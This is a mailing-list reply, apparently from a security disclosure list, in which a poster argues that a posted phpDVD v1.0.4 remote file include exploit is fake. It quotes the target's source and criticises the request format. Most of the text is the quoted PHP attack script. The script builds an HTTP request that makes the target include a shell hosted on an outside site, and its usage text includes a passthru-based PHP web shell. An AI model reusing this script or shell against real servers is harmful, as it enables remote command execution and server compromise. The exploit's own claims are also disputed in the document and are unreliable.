<<< Date Index >>>     <<< Thread Index >>>

Re: phpDVD v1.0.4 (dvd_config_file) Remote File Include Exploit



FAKE!! i think that this guy just take some exploits on the web and
modify them a little then re-post them..

index.php, first 2 lines:

<?
$dvd_config_file = "config.php";  // Full path and name of the config file


so, where is the RFI?
but is obvious that you do not understand anything of this, let's take
a look at "your" exploit:

$packet ="GET ".$p."index.php?dvd_config_file=".$shell."?cmd=".$cmd."%00 
HTTP/1.0\r\n";

i do not think that:
1 - will work with 2 '?' in the url
2 - you now why rgod or some one else putted %00 at the end of the
url..

hope to never see you nick again


Saturday, August 11, 2007, 5:04:36 PM, you wrote:

> #!/usr/bin/php -q -d short_open_tag=on
> <?
> print '

> //'===============================================================================================
> //'[Script       : phpDVD v1.0.4
> //'[Author      : iLker Kandemir <ilkerkandemir[at]mynet.com>
> //'[S.Page     : http://ugo.scarlata.it/phpdvd/phpDVD-1.0.4.tar.gz
> //'[Dork        : "phpDVD v1.0.4"
> //'===============================================================================================

> //'[[Code]]------------------------------------------------------
> //'
> //'  require($dvd_config_file);
> //'
> //'[[Code]]---------------------------------------------------------

> ';

> if ($argc<4) {
> print ('
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> Usage: php '.$argv[0].' host shell cmd OPTIONS
> host:      script server (ip/hostname)
> shell:     path to shell
> cmd:       a shell command (ls -la)
> Options:
> -p[port]:    specify a port other than 80
> -P[ip:port]: specify a proxy
> Example:
> php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
> shell.txt: <?php ob_clean();echo"iLker Kandemir
> www.mefistolabs.com";ini_set("max_execution_time",0);echo
> "mefistolabs";passthru($_GET["cmd"]);die;?>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> ');
> die;
> }

> error_reporting(0);
> ini_set("max_execution_time",0);
> ini_set("default_socket_timeout",5);

> function quick_dump($string)
> {
>   $result='';$exa='';$cont=0;
>   for ($i=0; $i<=strlen($string)-1; $i++)
>   {
>    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
>    {$result.="  .";}
>    else
>    {$result.="  ".$string[$i];}
>    if (strlen(dechex(ord($string[$i])))==2)
>    {$exa.=" ".dechex(ord($string[$i]));}
>    else
>    {$exa.=" 0".dechex(ord($string[$i]));}
>    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
>   }
>  return $exa."\r\n".$result;
> }
> $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
> function sendpackets($packet)
> {
>   global $proxy, $host, $port, $html, $proxy_regex;
>   if ($proxy=='') {
>     $ock=fsockopen(gethostbyname($host),$port);
>     if (!$ock) {
>       echo 'No response from '.$host.':'.$port; die;
>     }
>   }
>   else {
>     $c = preg_match($proxy_regex,$proxy);
>     if (!$c) {
>       echo 'Not a valid proxy...';die;
>     }
>     $parts=explode(':',$proxy);
>     echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
>     $ock=fsockopen($parts[0],$parts[1]);
>     if (!$ock) {
>       echo 'No response from proxy...';die;
>     }
>   }
>   fputs($ock,$packet);
>   if ($proxy=='') {
>     $html='';
>     while (!feof($ock)) {
>       $html.=fgets($ock);
>     }
>   }
>   else {
>     $html='';
>     while ((!feof($ock)) or
> (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
>       $html.=fread($ock,1);
>     }
>   }
>   fclose($ock);
>   #debug
>   #echo "\r\n".$html;
> }
> function make_seed()
> {
>    list($usec, $sec) = explode(' ', microtime());
>    return (float) $sec + ((float) $usec * 100000);
> }

> $host=$argv[1];
> $shell=$argv[2];
> $cmd="";

> $port=80;
> $proxy="";
> for ($i=3; $i<$argc; $i++){
> $temp=$argv[$i][0].$argv[$i][1];
> if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
> if ($temp=="-p")
> {
>   $port=str_replace("-p","",$argv[$i]);
> }
> if ($temp=="-P")
> {
>   $proxy=str_replace("-P","",$argv[$i]);
> }
> }

> if ($proxy=='') {$p='http://'.$host.':'.$port;}

> $packet ="GET
> ".$p."index.php?dvd_config_file=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n";
> $packet.="Host: ".$host."\r\n";
> $packet.="Connection: Close\r\n\r\n";
> sendpackets($packet);
> if (strstr($html,"mefistolabs"))
> {
> $temp=explode("mefistolabs",$html);
> die($temp[1]);
> }
> echo "Exploit ERROR";
> echo "www.mefistolabs.com";
?>>
> # MefistoLabs.Com

-- 
Best regards,
 BlackHawk                            mailto:hawkgotyou@xxxxxxxxx